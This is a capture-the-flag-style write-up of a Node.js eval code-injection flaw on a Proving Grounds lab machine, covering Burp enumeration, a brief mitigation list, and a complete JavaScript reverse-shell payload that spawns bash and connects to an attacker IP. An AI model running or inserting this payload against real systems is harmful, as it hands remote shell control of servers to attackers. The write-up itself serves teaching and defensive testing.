WEB SECURITY — CODE EXECUTION
Eval(“console.log(‘RCE Warning’)”)
Remote Code Execution in Node.js using the Eval function — Dibble HTB machine
Eval function is a JavaScript function that evaluates inputs in strings and expressions and dynamically generates them into executable run-time code interpreted by the browser or the back-end server.
Because of its powerful capabilities, an attacker can leverage the function to pass malicious payloads to the application’s back-end, instructing it to execute certain operations. Like, reading and writing files or establishing network connections (reverse shells) with the same permissions as the running web service allowing the attacker to control the entire server.
Today, we will test a vulnerable NodeJS application that uses the notorious eval function and compromise the server. The steps will be demonstrated on the Dribble machine on Offensive Security — Proving Grounds.
🔍$_Enumeration_Phase
Whenever I start looking into a web application, I start browsing through the application as a regular user while taking notes on the side of any interesting endpoints or unusual behavior the application displays.
In this case, we have a ticket management application written in NodeJS to track incidents and technical issues for a company’s internal users. I am familiar with the common NodeJS vulnerabilities such as command injections and serialization. So, when I started looking into the application, I noted these vulnerabilities on the side to take an in-depth look.
After registering as a user, I came across /logs endpoint that allows the user to create new tickets. I tried to create one as a regular user and intercepted the request with Burp proxy.
I noticed there are 4 interesting parameters: (conenct.sid cookie, userLevel that has a base64 value, username and msg )
I started fuzzing the parameters with the special characters and found that the application encodes them correctly. So no dice in there.
Then, I tried passing encoded arithmetic operations like 1+1 in the parameters to see if the application would evaluate them.
As we see in the below screenshot, the application evaluated the input in the msg parameter. So, we can infer the application is vulnerable to code injection attack😈.
🔥$_Attack_Demo
Now, we have identified that the application executes JavaScript code on the back-end, it is time to weaponize it. We will use a NodeJS reverse shell and see if we get a connection back to our machine.
The code below creates a function that calls the JS child_process module with the require function, creating new child processes of the main Node.js process.
Then it uses the spawn function to pass the shell commands; in our case is a bash shell that gets executed in the newly created child processes.
And, finally, it creates a new connection with the port number and IP address of the attacking machine and piping the shell’s stdin (input) and piping out the client’s output (stdout).
(function(){
var net = require("net"),
cp = require("child_process"),
sh = cp.spawn("/bin/bash", []);
var client = new net.Socket();
//create connection to the attacking machine
client.connect(80, "192.168.49.243", function(){
client.pipe(sh.stdin);
sh.stdout.pipe(client);
sh.stderr.pipe(client);
});
return /a/;
})()%I URL encoded the shell and sent the request to the application.
Great, it looks like there are no sandboxing controls in place, and we executed the code successfully and got a shell.
$_Mitigation
Things to keep in mind to avoid code injections in NodeJS
- It is always important to validate user inputs on server side before processing.
- Sanitize characters that are used in command injections
& ; ‘ \ “ | * ? ~ < > ^ ( ) [ ] { } - Do not use the eval () function, there other safer functions to use.
That’s all for today. Thanks for reading !!
🔔 All of the used commands can be found at R3d-Buck3T — Notion (Web Application Testing — NodeJS)
